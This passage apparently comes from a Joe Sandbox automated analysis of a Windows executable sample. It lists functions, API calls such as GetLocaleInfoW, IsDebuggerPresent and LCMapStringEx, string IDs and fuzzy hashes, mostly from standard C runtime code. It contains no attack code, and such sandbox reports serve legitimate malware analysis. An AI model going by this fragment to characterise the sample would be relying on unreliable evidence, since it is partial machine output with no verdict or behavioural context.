                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 9adfc55c13b7a0b8dfd7250fabbcb452e40c278b3293de06f9682e50a2cd47ef
                            • Instruction ID: 847774c1b5b923570604e16defe46bc67a451f7f75d5c1d969812f83d36fa24f
                            • Opcode Fuzzy Hash: 9adfc55c13b7a0b8dfd7250fabbcb452e40c278b3293de06f9682e50a2cd47ef
                            • Instruction Fuzzy Hash: 43E02B35A2051197DA3B3F698C107DB7A4CDF497B0F1E4127EC069A0D1DF61CCC181A1

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: H_prolog3
                            • String ID:
                            • API String ID: 431132790-0
                            • Opcode ID: 0166a5c0a04667e8efadab5fad5bb22dbb9025a74de003927b855d4cc256de3a
                            • Instruction ID: ce33191cb3e5da83c7d3344cdbdb5c63b922c6e63c2f1170c60986d8c678e699
                            • Opcode Fuzzy Hash: 0166a5c0a04667e8efadab5fad5bb22dbb9025a74de003927b855d4cc256de3a
                            • Instruction Fuzzy Hash: 83E09A76C0120D9EDB01DFD4C452BEFBBFCAF08304F508026A605EA181EB7457458BA1

                            Non-executed Functions

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: __floor_pentium4
                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                            • API String ID: 4168288129-2761157908
                            • Opcode ID: b22c4350bf6a37f8290311a012320a8963e4bc287fbf31f31c47bcb7ed9843f6
                            • Instruction ID: a0154d404715fa91b1bedf204bcabc18434b68971ce92d2011497fa3b14bbdb2
                            • Opcode Fuzzy Hash: b22c4350bf6a37f8290311a012320a8963e4bc287fbf31f31c47bcb7ed9843f6
                            • Instruction Fuzzy Hash: 2CD24A71E082388FDB66CE28ED407EAB7B9EB45304F1545EAD40DE7240E778AE858F41
                            APIs
                            • GetLocaleInfoW.KERNEL32(00000000,2000000B,003229D9,00000002,00000000,?,?,?,003229D9,?,00000000), ref: 00322760
                            • GetLocaleInfoW.KERNEL32(00000000,20001004,003229D9,00000002,00000000,?,?,?,003229D9,?,00000000), ref: 00322789
                            • GetACP.KERNEL32(?,?,003229D9,?,00000000), ref: 0032279E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: InfoLocale
                            • String ID: ACP$OCP
                            • API String ID: 2299586839-711371036
                            • Opcode ID: 5689e7bb6d0b398ae2787e0dc6abc44c517ae073ee2d9dfe8ffb9d1a3fc941f3
                            • Instruction ID: 7b1f257732352ba9a376076180b7d1d5c32447e654115192311d130e4cb0c551
                            • Opcode Fuzzy Hash: 5689e7bb6d0b398ae2787e0dc6abc44c517ae073ee2d9dfe8ffb9d1a3fc941f3
                            • Instruction Fuzzy Hash: 1021C536608120BADB3B8F5CED41AA773AAEF64F60B578434E90AD7112E732DD41C350
                            APIs
                              • Part of subcall function 003193B0: GetLastError.KERNEL32(?,00000000,00315BD4,?,?,?,?,00000003,003115E2,?,00311551,?,00000016,00311760), ref: 003193B4
                              • Part of subcall function 003193B0: SetLastError.KERNEL32(00000000,00000016,00311760,?,?,?,?,?,00000000), ref: 00319456
                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 003229AB
                            • IsValidCodePage.KERNEL32(00000000), ref: 003229E9
                            • IsValidLocale.KERNEL32(?,00000001), ref: 003229FC
                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00322A44
                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00322A5F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                            • String ID:
                            • API String ID: 415426439-0
                            • Opcode ID: 05775229fc69b92f657b9d0dacb87b079bf3d6629e11dde6dec31d0168945db8
                            • Instruction ID: f0b64c9842d54921c4b63d2670605726330bc008c8a3f9afe443c06431448316
                            • Opcode Fuzzy Hash: 05775229fc69b92f657b9d0dacb87b079bf3d6629e11dde6dec31d0168945db8
                            • Instruction Fuzzy Hash: CB516171900226BBDB26DFA5EC41ABF77B8FF14700F054529E911EB190EB719E50CB61
                            APIs
                              • Part of subcall function 003193B0: GetLastError.KERNEL32(?,00000000,00315BD4,?,?,?,?,00000003,003115E2,?,00311551,?,00000016,00311760), ref: 003193B4
                              • Part of subcall function 003193B0: SetLastError.KERNEL32(00000000,00000016,00311760,?,?,?,?,?,00000000), ref: 00319456
                            • GetACP.KERNEL32(?,?,?,?,?,?,003178B4,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00321FED
                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,003178B4,?,?,?,00000055,?,-00000050,?,?), ref: 00322024
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00322187
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ErrorLast$CodeInfoLocalePageValid
                            • String ID: utf8
                            • API String ID: 607553120-905460609
                            • Opcode ID: 3cd3ccc0f1c4049d721a53a5604e4b4b9c119846a0c8da62519b41255cea8052
                            • Instruction ID: b6ee684ade9477e195264f818111dba44dcb5595f8a4085e42dbcb3ad4fb766e
                            • Opcode Fuzzy Hash: 3cd3ccc0f1c4049d721a53a5604e4b4b9c119846a0c8da62519b41255cea8052
                            • Instruction Fuzzy Hash: 45711932600721BADB2BAB74ED42FBB73ACEF14700F114529F615DB181EB70E950C6A1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c978cbae2d2b2e7e34fda7347b027cb190bd780ef1dc569dc29ed165eb3e7d8e
                            • Instruction ID: e213e81cc160fec4830f470fb49f797a500ea6fc7213e84baf4d861cb39ad51d
                            • Opcode Fuzzy Hash: c978cbae2d2b2e7e34fda7347b027cb190bd780ef1dc569dc29ed165eb3e7d8e
                            • Instruction Fuzzy Hash: 18023D71E01619DBDF19CFA8D8806EDBBB1FF88314F258169D515E7380D731AA41CB90
                            APIs
                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0030D785
                            • IsDebuggerPresent.KERNEL32 ref: 0030D851
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0030D86A
                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0030D874
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                            • String ID:
                            • API String ID: 254469556-0
                            • Opcode ID: 5c2afbd85ccf532ed32094d824a6c3c9af47e359ee76c67c4616d690a18fcce5
                            • Instruction ID: 165f6e031bfc34d3b816bf2b4022ca7393cda3470142623e4c273b8307139f79
                            • Opcode Fuzzy Hash: 5c2afbd85ccf532ed32094d824a6c3c9af47e359ee76c67c4616d690a18fcce5
                            • Instruction Fuzzy Hash: CA31D875D05218DBDF21DFA4D9497CDBBB8BF08704F1041AAE40DAB290E7719A858F45
                            APIs
                              • Part of subcall function 003193B0: GetLastError.KERNEL32(?,00000000,00315BD4,?,?,?,?,00000003,003115E2,?,00311551,?,00000016,00311760), ref: 003193B4
                              • Part of subcall function 003193B0: SetLastError.KERNEL32(00000000,00000016,00311760,?,?,?,?,?,00000000), ref: 00319456
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0032239F
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003223E9
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003224AF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: InfoLocale$ErrorLast
                            • String ID:
                            • API String ID: 661929714-0
                            • Opcode ID: 595e1ae483105a9f95fab70caa4ab5a67b44a1841443f0938b2cd8100fa5dbbf
                            • Instruction ID: c4f9d6e336f944af8c8ef981b346bf6d0afd2cc7d7df00fff1559dadc00e9a47
                            • Opcode Fuzzy Hash: 595e1ae483105a9f95fab70caa4ab5a67b44a1841443f0938b2cd8100fa5dbbf
                            • Instruction Fuzzy Hash: 3E61C271950127AFEB2AEF29EC92BABB7A8EF04300F118179ED05C6581E774DD81CB50
                            APIs
                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 003116DB
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 003116E5
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 003116F2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?,003059B9,00000000,00000000), ref: 003138CE
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003138ED
                            Similarity
                            • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID:
                            • API String ID: 1518329722-0
                            Strings
                            Similarity
                            • API ID:
                            • String ID: 0z-1$z-1
                            • API String ID: 0-2286291861
                            APIs
                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0031B4CA,?,?,00000008,?,?,0032708B,00000000), ref: 0031B6FC
                            Similarity
                            • API ID: ExceptionRaise
                            • String ID:
                            • API String ID: 3997070919-0
                            APIs
                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0030D2B7
                            Similarity
                            • API ID: FeaturePresentProcessor
                            • String ID:
                            • API String ID: 2325560087-0
                            APIs
                              • Part of subcall function 003193B0: GetLastError.KERNEL32(?,00000000,00315BD4,?,?,?,?,00000003,003115E2,?,00311551,?,00000016,00311760), ref: 003193B4
                              • Part of subcall function 003193B0: SetLastError.KERNEL32(00000000,00000016,00311760,?,?,?,?,?,00000000), ref: 00319456
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003225F2
                            Similarity
                            • API ID: ErrorLast$InfoLocale
                            • String ID:
                            • API String ID: 3736152602-0
                            APIs
                              • Part of subcall function 003193B0: GetLastError.KERNEL32(?,00000000,00315BD4,?,?,?,?,00000003,003115E2,?,00311551,?,00000016,00311760), ref: 003193B4
                              • Part of subcall function 003193B0: SetLastError.KERNEL32(00000000,00000016,00311760,?,?,?,?,?,00000000), ref: 00319456
                            • EnumSystemLocalesW.KERNEL32(0032234B,00000001,00000000,?,-00000050,?,0032297F,00000000,?,?,?,00000055,?), ref: 00322297
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem
                            • String ID:
                            • API String ID: 2417226690-0
                            APIs
                              • Part of subcall function 003193B0: GetLastError.KERNEL32(?,00000000,00315BD4,?,?,?,?,00000003,003115E2,?,00311551,?,00000016,00311760), ref: 003193B4
                              • Part of subcall function 003193B0: SetLastError.KERNEL32(00000000,00000016,00311760,?,?,?,?,?,00000000), ref: 00319456
                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00322567,00000000,00000000,?), ref: 003227F9
                            Similarity
                            • API ID: ErrorLast$InfoLocale
                            • String ID:
                            • API String ID: 3736152602-0
                            APIs
                              • Part of subcall function 003193B0: GetLastError.KERNEL32(?,00000000,00315BD4,?,?,?,?,00000003,003115E2,?,00311551,?,00000016,00311760), ref: 003193B4
                              • Part of subcall function 003193B0: SetLastError.KERNEL32(00000000,00000016,00311760,?,?,?,?,?,00000000), ref: 00319456
                            • EnumSystemLocalesW.KERNEL32(0032259E,00000001,00000000,?,-00000050,?,00322947,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0032230A
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem
                            • String ID:
                            • API String ID: 2417226690-0
                            APIs
                              • Part of subcall function 00313A77: EnterCriticalSection.KERNEL32(?,?,0031643D,00000000,0033D530,0000000C,00316405,?,?,0031971A,?,?,0031954E,00000001,00000364,?), ref: 00313A86
                            • EnumSystemLocalesW.KERNEL32(0031A9D3,00000001,0033D710,0000000C,0031AD8C,00000000), ref: 0031AA18
                            Similarity
                            • API ID: CriticalEnterEnumLocalesSectionSystem
                            • String ID:
                            • API String ID: 1272433827-0
                            APIs
                              • Part of subcall function 003193B0: GetLastError.KERNEL32(?,00000000,00315BD4,?,?,?,?,00000003,003115E2,?,00311551,?,00000016,00311760), ref: 003193B4
                              • Part of subcall function 003193B0: SetLastError.KERNEL32(00000000,00000016,00311760,?,?,?,?,?,00000000), ref: 00319456
                            • EnumSystemLocalesW.KERNEL32(00322133,00000001,00000000,?,?,003229A1,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00322211
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem
                            • String ID:
                            • API String ID: 2417226690-0
                            APIs
                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0031842A,?,20001004,00000000,00000002,?,?,00317A1C), ref: 0031AEC4
                            Similarity
                            • API ID: InfoLocale
                            • String ID:
                            • API String ID: 2299586839-0
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(Function_0000D911,0030D100), ref: 0030D90A
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            Strings
                            Similarity
                            • API ID:
                            • String ID: ~~~~~~~~
                            • API String ID: 0-3303759636
                            APIs
                            Similarity
                            • API ID: HeapProcess
                            • String ID:
                            • API String ID: 54951025-0
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030972F
                            • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0030984D
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 003098E4
                            • Concurrency::cancel_current_task.LIBCPMT ref: 00309907
                            • Concurrency::cancel_current_task.LIBCPMT ref: 0030990C
                            • Concurrency::cancel_current_task.LIBCPMT ref: 00309911
                            Similarity
                            • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_dtorLockit::_Lockit::~_
                            • String ID: bad locale name$false$true
                            • API String ID: 2199893758-1062449267
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0030CBF1
                            • __alloca_probe_16.LIBCMT ref: 0030CC1D
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 0030CC5C
                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0030CC79
                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0030CCB8
                            • __alloca_probe_16.LIBCMT ref: 0030CCD5
                            • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0030CD17
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0030CD3A
                            Similarity
                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                            • String ID:
                            • API String ID: 2040435927-0
                            Similarity
                            • API ID: _strrchr
                            • String ID:
                            • API String ID: 3213747228-0
                            APIs
                            • type_info::operator==.LIBVCRUNTIME ref: 00310613
                            • ___TypeMatch.LIBVCRUNTIME ref: 0031071E
                            • CallUnexpected.LIBVCRUNTIME ref: 0031088C
                            Similarity
                            • API ID: CallMatchTypeUnexpectedtype_info::operator==
                            • String ID: csm$csm$csm
                            • API String ID: 1206542248-393685449
                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 0030FFF7
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0030FFFF
                            • _ValidateLocalCookies.LIBCMT ref: 00310088
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 003100B3
                            • _ValidateLocalCookies.LIBCMT ref: 00310108
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            APIs
                            • GetLastError.KERNEL32(?,?,0031017B,0030E32B,0030D955), ref: 00310192
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003101A0
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003101B9
                            • SetLastError.KERNEL32(00000000,0031017B,0030E32B,0030D955), ref: 0031020B
                            Similarity
                            • API ID: ErrorLastValue___vcrt_
                            • String ID:
                            • API String ID: 3852720340-0
                            APIs
                            • __EH_prolog3.LIBCMT ref: 0030B622
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030B62C
                            • int.LIBCPMT ref: 0030B643
                              • Part of subcall function 00301E90: std::_Lockit::_Lockit.LIBCPMT ref: 00301EA1
                              • Part of subcall function 00301E90: std::_Lockit::~_Lockit.LIBCPMT ref: 00301EBB
                            • codecvt.LIBCPMT ref: 0030B666
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030B69D
                            • Concurrency::cancel_current_task.LIBCPMT ref: 0030B6AA
                            Similarity
                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_taskH_prolog3codecvt
                            • String ID:
                            • API String ID: 2746682151-0
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302019
                            • __Getctype.LIBCPMT ref: 0030207E
                            • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0030209A
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030212F
                            Similarity
                            • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_dtorLockit::_Lockit::~_
                            • String ID: bad locale name
                            • API String ID: 3327844093-1405518554
                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,84FDAC87,?,?,00000000,0032B6CB,000000FF,?,00311A6C,?,?,00311A40,00000016), ref: 00311AC5
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00311AD7
                            • FreeLibrary.KERNEL32(00000000,?,00000000,0032B6CB,000000FF,?,00311A6C,?,?,00311A40,00000016), ref: 00311AF9
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            APIs
                            • __alloca_probe_16.LIBCMT ref: 0031EBE3
                            • __alloca_probe_16.LIBCMT ref: 0031ECAC
                            • __freea.LIBCMT ref: 0031ED13
                              • Part of subcall function 0031977E: RtlAllocateHeap.NTDLL(00000000,?,?,?,0030E127,?,?,?,?,?,00301103,?,?), ref: 003197B0
                            • __freea.LIBCMT ref: 0031ED26
                            • __freea.LIBCMT ref: 0031ED33
                            Similarity
                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                            • String ID:
                            • API String ID: 1423051803-0
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 003091D3
                            • std::_Lockit::_Lockit.LIBCPMT ref: 003091F6
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00309216
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 003092A3
                            • Concurrency::cancel_current_task.LIBCPMT ref: 003092BB
                            Similarity
                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                            • String ID:
                            • API String ID: 3053331623-0
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00308B23
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00308B46
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00308B66
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00308BF3
                            • Concurrency::cancel_current_task.LIBCPMT ref: 00308C0B
                            Similarity
                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                            • String ID:
                            • API String ID: 3053331623-0
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00308693
                            • std::_Lockit::_Lockit.LIBCPMT ref: 003086B6
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 003086D6
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00308763
                            • Concurrency::cancel_current_task.LIBCPMT ref: 0030877B
                            Similarity
                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                            • String ID:
                            • API String ID: 3053331623-0
                            APIs
                            • __EH_prolog3.LIBCMT ref: 0030C46C
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030C477
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030C4E5
                              • Part of subcall function 0030C5C9: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0030C5E1
                            • std::locale::_Setgloballocale.LIBCPMT ref: 0030C492
                            • _Yarn.LIBCPMT ref: 0030C4A8
                            Similarity
                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                            • String ID:
                            • API String ID: 1088826258-0
                            APIs
                            Strings
                            Similarity
                            • API ID: _strcspn
                            • String ID: <3$<3
                            • API String ID: 3709121408-544789574
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00309988
                            • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003099F3
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00309A8A
                            Strings
                            Similarity
                            • API ID: std::_$Lockit$Locinfo::_Locinfo_dtorLockit::_Lockit::~_
                            • String ID: bad locale name
                            • API String ID: 3553999535-1405518554
                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 0030243F
                              • Part of subcall function 0030E360: RaiseException.KERNEL32(E06D7363,00000001,00000003,003011AC,?,?,?,?,003011AC,?,0033D954), ref: 0030E3C1
                            Strings
                            Similarity
                            • API ID: ExceptionRaise___std_exception_copy
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 3109751735-1866435925
                            APIs
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00311288,00000000,?,003406A4,?,?,?,0031142B,00000004,InitializeCriticalSectionEx,0032DCA8,InitializeCriticalSectionEx), ref: 003112E4
                            • GetLastError.KERNEL32(?,00311288,00000000,?,003406A4,?,?,?,0031142B,00000004,InitializeCriticalSectionEx,0032DCA8,InitializeCriticalSectionEx,00000000,?,00311072), ref: 003112EE
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00311316
                            Strings
                            Similarity
                            • API ID: LibraryLoad$ErrorLast
                            • String ID: api-ms-
                            • API String ID: 3177248105-2084034818
                            APIs
                            • GetConsoleOutputCP.KERNEL32(84FDAC87,00000000,00000000,00000000), ref: 0031BF93
                              • Part of subcall function 0031F3A3: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0031ED09,?,00000000,-00000008), ref: 0031F404
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0031C1E5
                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0031C22B
                            • GetLastError.KERNEL32 ref: 0031C2CE
                            Similarity
                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                            • String ID:
                            • API String ID: 2112829910-0
                            APIs
                            Similarity
                            • API ID: AdjustPointer
                            • String ID:
                            • API String ID: 1740715915-0
                            APIs
                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00324B04,00000000,00000001,0000000C,00000000,?,0031C322,00000000,00000000,00000000), ref: 003260F0
                            • GetLastError.KERNEL32(?,00324B04,00000000,00000001,0000000C,00000000,?,0031C322,00000000,00000000,00000000,00000000,00000000,?,0031C8C5,?), ref: 003260FC
                              • Part of subcall function 003260C2: CloseHandle.KERNEL32(FFFFFFFE,0032610C,?,00324B04,00000000,00000001,0000000C,00000000,?,0031C322,00000000,00000000,00000000,00000000,00000000), ref: 003260D2
                            • ___initconout.LIBCMT ref: 0032610C
                              • Part of subcall function 00326084: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,003260B3,00324AF1,00000000,?,0031C322,00000000,00000000,00000000,00000000), ref: 00326097
                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00324B04,00000000,00000001,0000000C,00000000,?,0031C322,00000000,00000000,00000000,00000000), ref: 00326121
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                            • String ID:
